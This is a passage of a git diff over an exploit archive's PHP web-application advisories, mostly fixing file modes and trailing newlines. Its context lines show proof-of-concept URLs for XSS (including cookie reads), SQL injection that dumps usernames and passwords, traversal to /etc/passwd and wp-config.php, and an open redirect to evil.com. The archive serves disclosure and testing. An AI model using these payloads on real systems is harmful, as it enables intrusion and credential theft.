Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex= \ No newline at end of file +http://www.example.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex= \ No newline at end of file diff --git a/platforms/php/webapps/36488.txt b/platforms/php/webapps/36488.txt old mode 100755 new mode 100644 index 50e6e196b..89d098459 --- a/platforms/php/webapps/36488.txt +++ b/platforms/php/webapps/36488.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WHOIS 1.4.2.3 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/wp-content/plugins/wp-whois/wp-whois-ajax.php?cmd=wpwhoisform&ms=Xss?domain=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/wp-whois/wp-whois-ajax.php?cmd=wpwhoisform&ms=Xss?domain=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36489.txt b/platforms/php/webapps/36489.txt old mode 100755 new mode 100644 index c89571b4c..881a426b4 --- a/platforms/php/webapps/36489.txt +++ b/platforms/php/webapps/36489.txt @@ -22,4 +22,4 @@ Content-Length: 156 duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2 Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print -Config \ No newline at end of file +Config \ No newline at end of file diff --git a/platforms/php/webapps/36492.txt b/platforms/php/webapps/36492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36493.txt b/platforms/php/webapps/36493.txt old mode 100755 new mode 100644 index 7375b9b9d..66f789618 --- a/platforms/php/webapps/36493.txt +++ b/platforms/php/webapps/36493.txt @@ -6,4 +6,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. Orchard 1.3.9 is vulnerable; other versions may be affected. -http://www.example.com/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fwww.netsparker.com%3f \ No newline at end of file +http://www.example.com/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fwww.netsparker.com%3f \ No newline at end of file diff --git a/platforms/php/webapps/36494.txt b/platforms/php/webapps/36494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36495.txt b/platforms/php/webapps/36495.txt old mode 100755 new mode 100644 index 405b41032..f37d6a98f --- a/platforms/php/webapps/36495.txt +++ b/platforms/php/webapps/36495.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Pligg CMS 1.1.2 is vulnerable; other versions may also be affected. -http://www.example.com/Audits/CMS/pligg_1.1.2/search.php?adv=1&status='and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0 \ No newline at end of file +http://www.example.com/Audits/CMS/pligg_1.1.2/search.php?adv=1&status='and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0 \ No newline at end of file diff --git a/platforms/php/webapps/36496.txt b/platforms/php/webapps/36496.txt old mode 100755 new mode 100644 index 3b4513fdd..2d60411b2 --- a/platforms/php/webapps/36496.txt +++ b/platforms/php/webapps/36496.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Pligg CMS 1.1.4 is vulnerable; other versions may also be affected. -http://www.example.com/demo/search/')%7B%7Dalert('xss');if(' \ No newline at end of file +http://www.example.com/demo/search/')%7B%7Dalert('xss');if(' \ No newline at end of file diff --git a/platforms/php/webapps/36497.txt b/platforms/php/webapps/36497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36498.txt b/platforms/php/webapps/36498.txt old mode 100755 new mode 100644 index 28648d087..5d680ab4a --- a/platforms/php/webapps/36498.txt +++ b/platforms/php/webapps/36498.txt @@ -9,4 +9,4 @@ Yaws 1.88 is vulnerable; other versions may be affected. http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E -http://www.example.com/editPage.yaws?node=home \ No newline at end of file +http://www.example.com/editPage.yaws?node=home \ No newline at end of file diff --git a/platforms/php/webapps/36499.txt b/platforms/php/webapps/36499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36506.txt b/platforms/php/webapps/36506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36508.txt b/platforms/php/webapps/36508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36509.txt b/platforms/php/webapps/36509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36510.txt b/platforms/php/webapps/36510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36512.txt b/platforms/php/webapps/36512.txt old mode 100755 new mode 100644 index 2ff78bb4f..32ddf88cb --- a/platforms/php/webapps/36512.txt +++ b/platforms/php/webapps/36512.txt @@ -6,4 +6,4 @@ Successfully exploiting the issue may allow an attacker to obtain sensitive info eFront 3.6.10 is vulnerable; other versions may also be affected. -http://www.example.com/student.php?ctg=personal&user=trainee&op=files&download=[file] \ No newline at end of file +http://www.example.com/student.php?ctg=personal&user=trainee&op=files&download=[file] \ No newline at end of file diff --git a/platforms/php/webapps/36520.txt b/platforms/php/webapps/36520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36521.txt b/platforms/php/webapps/36521.txt old mode 100755 new mode 100644 index 710a78730..797ac352a --- a/platforms/php/webapps/36521.txt +++ b/platforms/php/webapps/36521.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/gallery_e.php?id=118+order+by+10-- \ No newline at end of file +http://www.example.com/gallery_e.php?id=118+order+by+10-- \ No newline at end of file diff --git a/platforms/php/webapps/36522.txt b/platforms/php/webapps/36522.txt old mode 100755 new mode 100644 index b08f4bc30..4186bb33e --- a/platforms/php/webapps/36522.txt +++ b/platforms/php/webapps/36522.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/pageE.php?id=118+order+by+10-- \ No newline at end of file +http://www.example.com/pageE.php?id=118+order+by+10-- \ No newline at end of file diff --git a/platforms/php/webapps/36523.txt b/platforms/php/webapps/36523.txt old mode 100755 new mode 100644 index 7ecade084..b83d37102 --- a/platforms/php/webapps/36523.txt +++ b/platforms/php/webapps/36523.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/pageH.php?id=104' \ No newline at end of file +http://www.example.com/pageH.php?id=104' \ No newline at end of file diff --git a/platforms/php/webapps/36524.txt b/platforms/php/webapps/36524.txt old mode 100755 new mode 100644 index 94dac39f9..44b6c7557 --- a/platforms/php/webapps/36524.txt +++ b/platforms/php/webapps/36524.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a ClipBucket 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file +http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file diff --git a/platforms/php/webapps/36525.txt b/platforms/php/webapps/36525.txt old mode 100755 new mode 100644 index efaaa11ce..70cbecb65 --- a/platforms/php/webapps/36525.txt +++ b/platforms/php/webapps/36525.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a ClipBucket 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file +http://www.example.com/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file diff --git a/platforms/php/webapps/36526.txt b/platforms/php/webapps/36526.txt old mode 100755 new mode 100644 index 999e9e41f..d37cf67e7 --- a/platforms/php/webapps/36526.txt +++ b/platforms/php/webapps/36526.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a ClipBucket 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file +http://www.example.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file diff --git a/platforms/php/webapps/36527.txt b/platforms/php/webapps/36527.txt old mode 100755 new mode 100644 index baffa1e57..91d361217 --- a/platforms/php/webapps/36527.txt +++ b/platforms/php/webapps/36527.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a ClipBucket 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type= \ No newline at end of file +http://www.example.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type= \ No newline at end of file diff --git a/platforms/php/webapps/36528.txt b/platforms/php/webapps/36528.txt old mode 100755 new mode 100644 index 86fd23f3d..10a1bf8d3 --- a/platforms/php/webapps/36528.txt +++ b/platforms/php/webapps/36528.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a ClipBucket 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file +http://www.example.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file diff --git a/platforms/php/webapps/36529.txt b/platforms/php/webapps/36529.txt old mode 100755 new mode 100644 index 38ecc07ed..59642df83 --- a/platforms/php/webapps/36529.txt +++ b/platforms/php/webapps/36529.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a ClipBucket 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E \ No newline at end of file +http://www.example.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/3653.php b/platforms/php/webapps/3653.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36530.txt b/platforms/php/webapps/36530.txt old mode 100755 new mode 100644 index 4888b72d0..292c8ee5d --- a/platforms/php/webapps/36530.txt +++ b/platforms/php/webapps/36530.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a ClipBucket 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E \ No newline at end of file +http://www.example.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/36531.txt b/platforms/php/webapps/36531.txt old mode 100755 new mode 100644 index 234339730..75885ab54 --- a/platforms/php/webapps/36531.txt +++ b/platforms/php/webapps/36531.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a ClipBucket 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 \ No newline at end of file +http://www.example.com/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 \ No newline at end of file diff --git a/platforms/php/webapps/36532.txt b/platforms/php/webapps/36532.txt old mode 100755 new mode 100644 index 15c11f701..1d84c970c --- a/platforms/php/webapps/36532.txt +++ b/platforms/php/webapps/36532.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a ClipBucket 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 \ No newline at end of file +http://www.example.com/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 \ No newline at end of file diff --git a/platforms/php/webapps/36534.txt b/platforms/php/webapps/36534.txt old mode 100755 new mode 100644 index f24dc7c85..cd13596c9 --- a/platforms/php/webapps/36534.txt +++ b/platforms/php/webapps/36534.txt @@ -4,4 +4,4 @@ Marinet CMS is prone to multiple SQL-injection vulnerabilities because the appli Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/room2.php?roomid=[SQLi] \ No newline at end of file +http://www.example.com/room2.php?roomid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36535.txt b/platforms/php/webapps/36535.txt old mode 100755 new mode 100644 index c6dec217d..edd0244f1 --- a/platforms/php/webapps/36535.txt +++ b/platforms/php/webapps/36535.txt @@ -4,4 +4,4 @@ Marinet CMS is prone to multiple SQL-injection vulnerabilities because the appli Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - http://www.example.com/galleryphoto.php?id=[SQLi] \ No newline at end of file + http://www.example.com/galleryphoto.php?id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36536.txt b/platforms/php/webapps/36536.txt old mode 100755 new mode 100644 index 422d3db68..fe380f417 --- a/platforms/php/webapps/36536.txt +++ b/platforms/php/webapps/36536.txt @@ -4,4 +4,4 @@ Marinet CMS is prone to multiple SQL-injection vulnerabilities because the appli Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/gallery.php?photoid=1&id=[SQLi] \ No newline at end of file +http://www.example.com/gallery.php?photoid=1&id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36538.txt b/platforms/php/webapps/36538.txt old mode 100755 new mode 100644 index b4d8e8c5e..109c601bb --- a/platforms/php/webapps/36538.txt +++ b/platforms/php/webapps/36538.txt @@ -8,4 +8,4 @@ Gregarius versions 0.6.1 and prior are vulnerable. http://www.example.com/?page=1[it'shere]&media=rss& http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8[it'shere xss with sql] -http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file +http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file diff --git a/platforms/php/webapps/36539.txt b/platforms/php/webapps/36539.txt old mode 100755 new mode 100644 index 385500452..c38de2312 --- a/platforms/php/webapps/36539.txt +++ b/platforms/php/webapps/36539.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Advanced File Management 1.4 is vulnerable; other versions may also be affected. -http://www.example.com/users.php?page=[xss] \ No newline at end of file +http://www.example.com/users.php?page=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36540.txt b/platforms/php/webapps/36540.txt old mode 100755 new mode 100644 index 4653841bc..687d22ddb --- a/platforms/php/webapps/36540.txt +++ b/platforms/php/webapps/36540.txt @@ -6,4 +6,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. WordPress Age Verification plugin 0.4 and prior versions are vulnerable. -http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com \ No newline at end of file +http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com \ No newline at end of file diff --git a/platforms/php/webapps/36541.txt b/platforms/php/webapps/36541.txt old mode 100755 new mode 100644 index fa45b043c..29cd8135e --- a/platforms/php/webapps/36541.txt +++ b/platforms/php/webapps/36541.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHP-Fusion 7.02.04 is vulnerable; other versions may also be affected. -http://www.example.com/[Path]/downloads.php?cat_id=[Xss] \ No newline at end of file +http://www.example.com/[Path]/downloads.php?cat_id=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/36543.txt b/platforms/php/webapps/36543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36544.txt b/platforms/php/webapps/36544.txt old mode 100755 new mode 100644 index c5982a881..4fc0f975f --- a/platforms/php/webapps/36544.txt +++ b/platforms/php/webapps/36544.txt @@ -30,4 +30,4 @@ http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedres http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts -http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters \ No newline at end of file +http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters \ No newline at end of file diff --git a/platforms/php/webapps/36549.txt b/platforms/php/webapps/36549.txt old mode 100755 new mode 100644 index e3598df05..ba7099fc6 --- a/platforms/php/webapps/36549.txt +++ b/platforms/php/webapps/36549.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc HD Video Share 1.3 is vulnerable; other versions may also be affected. http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14 -http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14â??a \ No newline at end of file +http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14â??a \ No newline at end of file diff --git a/platforms/php/webapps/3655.htm b/platforms/php/webapps/3655.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36550.txt b/platforms/php/webapps/36550.txt old mode 100755 new mode 100644 index b81f76601..9e27d7063 --- a/platforms/php/webapps/36550.txt +++ b/platforms/php/webapps/36550.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHP Membership Site Manager Script version 2.1 and prior are vulnerable. -http://www.example.com/[path]/scripts/membershipsite/manager/index.php?action=search&key=[xss] \ No newline at end of file +http://www.example.com/[path]/scripts/membershipsite/manager/index.php?action=search&key=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36551.txt b/platforms/php/webapps/36551.txt old mode 100755 new mode 100644 index 106896593..24492544f --- a/platforms/php/webapps/36551.txt +++ b/platforms/php/webapps/36551.txt @@ -4,4 +4,4 @@ PHP Ringtone Website is prone to multiple cross-site scripting vulnerabilities b An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss] \ No newline at end of file +http://www.example.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36552.txt b/platforms/php/webapps/36552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36554.txt b/platforms/php/webapps/36554.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36559.txt b/platforms/php/webapps/36559.txt old mode 100755 new mode 100644 index 21d8d2438..c6c1165a6 --- a/platforms/php/webapps/36559.txt +++ b/platforms/php/webapps/36559.txt @@ -37,4 +37,4 @@ exit; | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php |-------------------------------------------------------------------------| - |*||*||*||*||*||*||*||*||*||*||*||*||* \ No newline at end of file + |*||*||*||*||*||*||*||*||*||*||*||*||* \ No newline at end of file diff --git a/platforms/php/webapps/36560.txt b/platforms/php/webapps/36560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36561.txt b/platforms/php/webapps/36561.txt old mode 100755 new mode 100644 index 345043f59..8c3cec47f --- a/platforms/php/webapps/36561.txt +++ b/platforms/php/webapps/36561.txt @@ -9,5 +9,4 @@ Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. [+]Proof Of Concept: -127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL - \ No newline at end of file +127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL \ No newline at end of file diff --git a/platforms/php/webapps/36565.txt b/platforms/php/webapps/36565.txt old mode 100755 new mode 100644 index c5c3b3f54..6142215fc --- a/platforms/php/webapps/36565.txt +++ b/platforms/php/webapps/36565.txt @@ -15,4 +15,4 @@ http://www.example.com/ATutor/login.php/mods/_standard/flowplayer/" <script>aler http://www.example.com/ATutor/browse.php/jscripts/infusion/framework/fss/" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/registration.php/themes/default/ie_styles.css" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/about.php/" <script>alert(document.cookie)</script>/index.php -http://www.example.com/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php \ No newline at end of file +http://www.example.com/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php \ No newline at end of file diff --git a/platforms/php/webapps/36566.txt b/platforms/php/webapps/36566.txt old mode 100755 new mode 100644 index a571b88fa..1a72a745b --- a/platforms/php/webapps/36566.txt +++ b/platforms/php/webapps/36566.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com/forum/register.php?'[xss] http://www.example.com/forum/register.php/''[xss] http://www.example.com/forum/logon.php?'"'[xss] -http://www.example.com/forum/logon.php/'"'[xss] \ No newline at end of file +http://www.example.com/forum/logon.php/'"'[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36567.txt b/platforms/php/webapps/36567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36568.txt b/platforms/php/webapps/36568.txt old mode 100755 new mode 100644 index ca581032a..975dd5c29 --- a/platforms/php/webapps/36568.txt +++ b/platforms/php/webapps/36568.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Giveaway Manager 3 is vulnerable; other versions may also be affected. -http://www.example.com/members.php?id=[XSS] \ No newline at end of file +http://www.example.com/members.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36569.txt b/platforms/php/webapps/36569.txt old mode 100755 new mode 100644 index f4526288f..2d95e74a1 --- a/platforms/php/webapps/36569.txt +++ b/platforms/php/webapps/36569.txt @@ -4,4 +4,4 @@ Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because i An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss] \ No newline at end of file +http://www.example.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/3657.txt b/platforms/php/webapps/3657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36572.txt b/platforms/php/webapps/36572.txt old mode 100755 new mode 100644 index 1acbc9766..6ff95bcfc --- a/platforms/php/webapps/36572.txt +++ b/platforms/php/webapps/36572.txt @@ -4,4 +4,4 @@ Toner Cart is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/united/show_series_ink.php?id=1â??a \ No newline at end of file +http://www.example.com/united/show_series_ink.php?id=1â??a \ No newline at end of file diff --git a/platforms/php/webapps/36573.txt b/platforms/php/webapps/36573.txt old mode 100755 new mode 100644 index feffea91f..13ec9f7b1 --- a/platforms/php/webapps/36573.txt +++ b/platforms/php/webapps/36573.txt @@ -4,4 +4,4 @@ MMORPG Zone is prone to an SQL-injection vulnerability because it fails to suffi Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/games/view_news.php?news_id=7â??a \ No newline at end of file +http://www.example.com/games/view_news.php?news_id=7â??a \ No newline at end of file diff --git a/platforms/php/webapps/36574.txt b/platforms/php/webapps/36574.txt old mode 100755 new mode 100644 index 78abd712d..24b1bae3f --- a/platforms/php/webapps/36574.txt +++ b/platforms/php/webapps/36574.txt @@ -4,4 +4,4 @@ Freelance Zone is prone to an SQL-injection vulnerability because it fails to su Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/freelance/show_code.php?code_id=8â??a \ No newline at end of file +http://www.example.com/freelance/show_code.php?code_id=8â??a \ No newline at end of file diff --git a/platforms/php/webapps/36576.txt b/platforms/php/webapps/36576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3658.htm b/platforms/php/webapps/3658.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36581.txt b/platforms/php/webapps/36581.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36582.txt b/platforms/php/webapps/36582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36583.txt b/platforms/php/webapps/36583.txt old mode 100755 new mode 100644 index 1213ee572..9d798e682 --- a/platforms/php/webapps/36583.txt +++ b/platforms/php/webapps/36583.txt @@ -4,4 +4,4 @@ The pnAddressbook module for PostNuke is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database -http://www.example.com/index.php module=pnAddressBook&func=viewDetail&formcall=edit&authid=2a630bd4b1cc5e7d03ef3ab28fb5e838&catview=0&sortview=0&formSearch=&all=1&menuprivate=0&total=78&page=1&char=&id=-46 union all select 1,2,3,group_concat(pn_uname,0x3a,pn_pass) \ No newline at end of file +http://www.example.com/index.php module=pnAddressBook&func=viewDetail&formcall=edit&authid=2a630bd4b1cc5e7d03ef3ab28fb5e838&catview=0&sortview=0&formSearch=&all=1&menuprivate=0&total=78&page=1&char=&id=-46 union all select 1,2,3,group_concat(pn_uname,0x3a,pn_pass) \ No newline at end of file diff --git a/platforms/php/webapps/36584.txt b/platforms/php/webapps/36584.txt old mode 100755 new mode 100644 index cd37870ca..2cebb96a5 --- a/platforms/php/webapps/36584.txt +++ b/platforms/php/webapps/36584.txt @@ -4,4 +4,4 @@ Vastal EzineShops is prone to an SQL-injection vulnerability because it fails to Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/mag/view_mags.php?cat_id=4â??a \ No newline at end of file +http://www.example.com/mag/view_mags.php?cat_id=4â??a \ No newline at end of file diff --git a/platforms/php/webapps/36586.txt b/platforms/php/webapps/36586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36589.txt b/platforms/php/webapps/36589.txt old mode 100755 new mode 100644 index a420626d5..99fbae431 --- a/platforms/php/webapps/36589.txt +++ b/platforms/php/webapps/36589.txt @@ -4,4 +4,4 @@ The 'com_br' component for Joomla! is prone to a local file-include vulnerabilit An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_br&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_br&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/3659.txt b/platforms/php/webapps/3659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36590.txt b/platforms/php/webapps/36590.txt old mode 100755 new mode 100644 index abe3feac9..f1f8375fd --- a/platforms/php/webapps/36590.txt +++ b/platforms/php/webapps/36590.txt @@ -4,4 +4,4 @@ Tribiq CMS is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or 